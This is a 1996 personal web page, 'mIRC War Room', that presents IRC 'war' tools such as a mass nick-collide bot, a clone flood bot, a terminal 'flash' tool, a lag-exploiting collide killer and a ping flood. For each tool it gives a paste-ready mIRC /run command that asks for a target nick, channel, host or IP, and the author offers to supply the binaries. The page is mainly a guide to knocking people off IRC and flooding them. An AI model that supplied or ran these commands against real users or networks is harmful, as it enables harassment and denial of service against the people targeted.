mIRC War Room
Info on how to use some of the more common war tools and reasons why they may not work. Don't send me any e-mail asking for any of these as they are floating all over the www, however if you really want them you can find me, TiAMaT, on DALnet and if I'm not busy I'll send them to you.
mcb.exe - Mass Collide Bot, ported by Dr. Bardo, Size (40 k)
Before servers used timestamping this was a very effective way of removing someone from IRC. But now whenever a nick collide is detected the nick who's been online longer gets to stay and the other one(your clone) gets killed.
Command Lines:
Single Collide:/run c:\path\mcb.exe -n $$?="Server to use?" $$?="Enter nick to collide:"
Multi Collide:/run c:\path\mcb.exe -nvau 50 $$?="Server to use?" $$?="Enter nicks to Collide:"
fb.exe - Flood Bot, ported by Dr. Bardo, Size (40 k)
An quick and easy way of loading alot of clones on a server to flood someone. Be careful, this one will get you /kill'd
Command Lines:
Text:/run c:\path\fb.exe $$?="Number of clones:" 25 $$?="Enter nick/chan to kill:" 1 $$?="Enter Server 1:" $$?="Enter Server 2:"
Finger:/run c:\path\fb.exe $$?="Number of clones:" 25 $$?="Enter nick/chan to kill:" 2 $$?="Enter Server 1:" $$?="Enter Server 2:"
Ping:/run c:\path\fb.exe $$?="Number of clones:" 25 $$?="Enter nick/chan to kill:" 3 $$?="Enter Server 1:" $$?="Enter Server 2:"
SED:/run c:\path\fb.exe $$?="Number of clones:" 25 $$?="Enter nick/chan to kill:" 4 $$?="Enter Server 1:" $$?="Enter Server 2:"
BotKiller:/run c:\path\fb.exe $$?="Number of clones:" 25 $$?="Enter nick/chan to kill:" 5 $$?="Enter Server 1:" $$?="Enter Server 2:"
Echo:/run c:\path\fb.exe $$?="Number of clones:" 25 $$?="Enter nick/chan to kill:" 6 $$?="Enter Server 1:" $$?="Enter Server 2:"
Blitz:/run c:\path\fb.exe $$?="Number of clones:" 25 $$?="Enter nick/chan to kill:" 7 $$?="Enter Server 1:" $$?="Enter Server 2:"
Version:/run c:\path\fb.exe $$?="Number of clones:" 25 $$?="Enter nick/chan to kill:" 8 $$?="Enter Server 1:" $$?="Enter Server 2 "
winll.exe - Win95 Link Looker, by Dr. Bardo, Size (221 k)
An excellent link looker. Just stick it on any server in the network where you want to find splits and it'll find them.
Command Line:
Link Looker:/run c:\path\winll.exe
flash.exe - Flash, ported by Dr. Bardo, Size (22 k)
This is useful for messing up a user's display on a unix based system. I've never used it so I can't really say whether or not it is that effective.
Command Lines:
Basic:/run c:\path\flash.exe $$?="Enter user@host to flash:" 1
Zmodem:/run c:\path\flash.exe $$?="Enter user@host to flash:" 2
Killer:/run c:\path\flash.exe $$?="Enter user@host to flash:" 3
sumo.exe - Sumo Lag Killer, ported by Dr. Bardo, Size (37 k)
An excellent way to kill someone whenever there in a excessive lag between two servers. Whenever someone changes their nick it will take awhile for the nick change to reach the lag'd server, and thats when you get them. This prog will watch for a victim to change their nick then it will change its nick on the lag'd server and collide them.
Command Line:
Sumo:/run c:\path\sumo.exe -n $$?="Enter Nick to Kill:" -s $$?="Enter Nicks Server:" -k $$?="Enter Lagged Server:" -c $$?="Enter Channel to watch in:"
ping.exe - Ping, from microsoft(look in c:\windows), Size (12 k)
This is not only unethical, but illegal. It is also frowned upon by almost all scripters. Don't do it!
Command Line:
Ping:/run c:\path\ping.exe -t -l $$?="Enter Packet Size:" -w 1 $$?="Enter IP to Ping Flood:"
Disclaimer: I take no responsibility for how you use this information. Some of the information on this page IS considered abusive and flooding so should you get killed, k:lined, or dropped by your ISP don't come crying to me cause you were warned!
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This page was created on Wednesday, September 25,1996
Please send all questions and comments to ircwar@geocities.com